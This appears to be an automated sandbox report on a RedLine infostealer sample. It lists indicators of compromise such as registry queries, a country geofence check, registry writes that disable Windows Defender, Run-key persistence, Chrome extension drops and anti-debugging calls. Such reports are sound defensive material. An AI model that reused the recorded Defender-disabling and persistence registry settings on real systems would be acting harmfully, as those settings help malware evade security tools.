redline | 071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jp0CXLB_GvSZC9M80QcltQld.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lLbXCz7SXYXsjA6c_OOLkbta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7074312.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	13D6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nHfqbSz1R7yMeq2emrExLe3i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	j0_HYWP91xVVEO5qgAhADQMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	269new.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	13D6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	o8y9myE_hSy5WMIZ1WbEsTSY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	o8y9myE_hSy5WMIZ1WbEsTSY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7074312.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lLbXCz7SXYXsjA6c_OOLkbta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3496651.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_q3DSTYx4Xbm8ZXlvvREKKu3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B30A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LA0H97Jy7JTXyhAMB8p82pGx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	210921.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B30A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_q3DSTYx4Xbm8ZXlvvREKKu3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jp0CXLB_GvSZC9M80QcltQld.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	210921.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	269new.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LA0H97Jy7JTXyhAMB8p82pGx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nHfqbSz1R7yMeq2emrExLe3i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	j0_HYWP91xVVEO5qgAhADQMS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3496651.scr

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Thu02d385ff55.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	Lahityrulo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	QUcFAJV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation	LuJlMYz.exe

Deletes itself 1 IoCs

pid	Process
8608	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk	disksyncer.exe

Loads dropped DLL 64 IoCs

pid	Process
3356	setup_install.exe
3356	setup_install.exe
3356	setup_install.exe
3356	setup_install.exe
3356	setup_install.exe
3356	setup_install.exe
2664	GAWNGaeYF0NZ2GVZiHMjYV5x.exe
1420	6IFGlk_zgPccCvwWf2NC4b1f.exe
1420	6IFGlk_zgPccCvwWf2NC4b1f.exe
972	vgugk_T7WYNeMpaMl4t2En2B.exe
972	vgugk_T7WYNeMpaMl4t2En2B.exe
972	vgugk_T7WYNeMpaMl4t2En2B.exe
9020	qX_AmYxAJXSju4VLMA5djsoE.tmp
8868	Conhost.exe
9128	Conhost.exe
9276	rundll32.exe
9304	installer.exe
9304	installer.exe
10060	autosubplayer.exe
9304	installer.exe
9816	MsiExec.exe
9816	MsiExec.exe
10060	autosubplayer.exe
8504	596B.exe
7056	WMIC.exe
7056	WMIC.exe
7056	WMIC.exe
7056	WMIC.exe
7056	WMIC.exe
6500	rundll32.exe
4996	79D6.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
2860	MsiExec.exe
2860	MsiExec.exe
9488	rundll32.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
10060	autosubplayer.exe
4996	79D6.exe
2860	MsiExec.exe
2860	MsiExec.exe
2860	MsiExec.exe
9304	installer.exe
2860	MsiExec.exe
2860	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
8704	MsiExec.exe
2860	MsiExec.exe
6536	C7CD.exe
6536	C7CD.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000200000001a2ed-540.dat	themida
behavioral6/files/0x000200000001a2cd-543.dat	themida
behavioral6/files/0x000200000001a2d4-539.dat	themida

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\CG8V_S91oQwcEZwFvnLaOyJx.exe = "0"	CG8V_S91oQwcEZwFvnLaOyJx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	CG8V_S91oQwcEZwFvnLaOyJx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	CG8V_S91oQwcEZwFvnLaOyJx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	CG8V_S91oQwcEZwFvnLaOyJx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	CG8V_S91oQwcEZwFvnLaOyJx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	CG8V_S91oQwcEZwFvnLaOyJx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	CG8V_S91oQwcEZwFvnLaOyJx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	CG8V_S91oQwcEZwFvnLaOyJx.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\E825.exe = "0"	E825.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	CG8V_S91oQwcEZwFvnLaOyJx.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	CG8V_S91oQwcEZwFvnLaOyJx.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Thu02bfe1521bcc038.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Thu02bfe1521bcc038.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Lyxegishaebo.exe\""	Sharefolder.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab	WMIC.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 22 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7074312.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LA0H97Jy7JTXyhAMB8p82pGx.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	j0_HYWP91xVVEO5qgAhADQMS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	269new.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SkVPVS3t6Y8W.EXe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B30A.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	foldershare.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lLbXCz7SXYXsjA6c_OOLkbta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qX_AmYxAJXSju4VLMA5djsoE.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	EBC2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Thu02bfe1521bcc038.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nHfqbSz1R7yMeq2emrExLe3i.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	210921.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3496651.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Jepaekynoha.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	13D6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_q3DSTYx4Xbm8ZXlvvREKKu3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jp0CXLB_GvSZC9M80QcltQld.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	o8y9myE_hSy5WMIZ1WbEsTSY.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json	LuJlMYz.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json	QUcFAJV.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	QUcFAJV.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	QUcFAJV.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\S:	C7CD.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\H:	C7CD.exe
File opened (read-only)	\??\Y:	C7CD.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	C7CD.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	C7CD.exe
File opened (read-only)	\??\J:	C7CD.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\L:	C7CD.exe
File opened (read-only)	\??\Q:	C7CD.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	C7CD.exe
File opened (read-only)	\??\P:	C7CD.exe
File opened (read-only)	\??\R:	C7CD.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	C7CD.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	C7CD.exe
File opened (read-only)	\??\N:	C7CD.exe
File opened (read-only)	\??\V:	C7CD.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	C7CD.exe
File opened (read-only)	\??\A:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
454	ip-api.com
18	ip-api.com
70	ipinfo.io
71	ipinfo.io
186	ipinfo.io
188	ipinfo.io
255	ipinfo.io
256	ipinfo.io

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	fENUqIS.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6	QUcFAJV.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_20042448ADAF8552A0F71F2212C13E64	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\cXKEjEvxPbALHdiUE2	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\YqJChhYnTMHzkMjCc	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	LuJlMYz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_20042448ADAF8552A0F71F2212C13E64	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\LUNOxqyZdvVpf2	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_E570DBC5D11455700AD5B49260C5167C	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_3B9C2111EAE052C5BA0EC1CBB6D70DEA	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\TzpzstmaipgnuWYOU	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_E570DBC5D11455700AD5B49260C5167C	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\RulYNORIEfYpYdh2	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	Conhost.exe
File opened for modification	C:\Windows\System32\Tasks\RulYNORIEfYpYdh	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\spuvuDPFHOyn	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\gkYTFFwaw	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\spuyBEwyIisc	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\bvmcjEjDUxHOOxIZsK	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	QUcFAJV.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	QUcFAJV.exe
File opened for modification	C:\Windows\System32\Tasks\eoTgVxzVyVjpEcHcuxi2	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
3892	_q3DSTYx4Xbm8ZXlvvREKKu3.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
4568	LA0H97Jy7JTXyhAMB8p82pGx.exe
4704	jp0CXLB_GvSZC9M80QcltQld.exe
2824	o8y9myE_hSy5WMIZ1WbEsTSY.exe
4816	lLbXCz7SXYXsjA6c_OOLkbta.exe
2788	nHfqbSz1R7yMeq2emrExLe3i.exe
2832	j0_HYWP91xVVEO5qgAhADQMS.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
5608	210921.exe
5700	269new.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
6108	3496651.scr
1568	7074312.scr
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
2872	CG8V_S91oQwcEZwFvnLaOyJx.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
7224	13D6.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
9036	B30A.exe
